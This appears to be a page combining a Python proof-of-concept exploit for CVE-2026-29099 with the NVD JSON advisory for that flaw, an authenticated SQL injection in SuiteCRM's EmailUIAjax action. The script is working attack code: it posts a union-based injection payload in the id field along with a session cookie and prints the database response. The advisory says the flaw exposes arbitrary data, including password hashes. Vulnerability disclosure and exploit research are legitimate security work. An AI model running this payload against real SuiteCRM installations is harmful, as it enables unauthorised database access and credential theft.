CVE-2026-29099

# Proof of Concept (PoC) for CVE-2026-29099 # Description: Exploits SQL Injection in SuiteCRM via EmailUIAjax action. import requests def exploit_suitecrm(target_url, session_cookie): """ Attempts to exploit the SQL injection vulnerability in SuiteCRM. """ # The endpoint vulnerable to the attack url = f"{target_url}/index.php" # Payload targeting the $id parameter in retrieve() # Using a simple Union Based injection to extract database version sql_payload = "1' UNION SELECT 1,2,3,4,version(),6,7,8,9-- -" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } cookies = { "PHPSESSID": session_cookie } # Data payload simulating the EmailUIAjax request data = { "module": "Emails", "action": "EmailUIAjax", "emailUIAction": "getSingleMessageFromSugar", "id": sql_payload } try: response = requests.post(url, data=data, headers=headers, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text[:500]) # Print first 500 chars of response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and valid session cookie target = "http://localhost/suitecrm" session_id = "valid_authenticated_session_id_here" exploit_suitecrm(target, session_id)

{"cve": {"id": "CVE-2026-29099", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:41.920", "lastModified": "2026-03-24T14:45:01.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the `retrieve()` function in `include/OutboundEmail/OutboundEmail.php` fails to properly neutralize the user controlled `$id` parameter. It is assumed that the function calling `retrieve()` will appropriately quote and sanitize the user input. However, two locations have been identified that can be reached through the `EmailUIAjax` action on the `Email()` module where this is not the case. As such, it is possible for an authenticated user to perform SQL injection through the `retrieve()` function. This affects the latest major versions 7.15 and 8.9. As there do not appear to be restrictions on which tables can be called, it would be possible for an attacker to retrieve arbitrary information from the database, including user information and password hashes. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de Gestión de Relaciones con Clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, la función 'retrieve()' en 'include/OutboundEmail/OutboundEmail.php' no neutraliza correctamente el parámetro '$id' controlado por el usuario. Se asume que la función que llama a 'retrieve()' citará y saneará adecuadamente la entrada del usuario. Sin embargo, se han identificado dos ubicaciones a las que se puede acceder a través de la acción 'EmailUIAjax' en el módulo 'Email()' donde este no es el caso. Como tal, es posible que un usuario autenticado realice una inyección SQL a través de la función 'retrieve()'. Esto afecta a las últimas versiones principales 7.15 y 8.9. Dado que no parece haber restricciones sobre qué tablas pueden ser llamadas, sería posible para un atacante recuperar información arbitraria de la base de datos, incluyendo información de usuario y hashes de contraseña. Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-38rf-h37x-7767", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}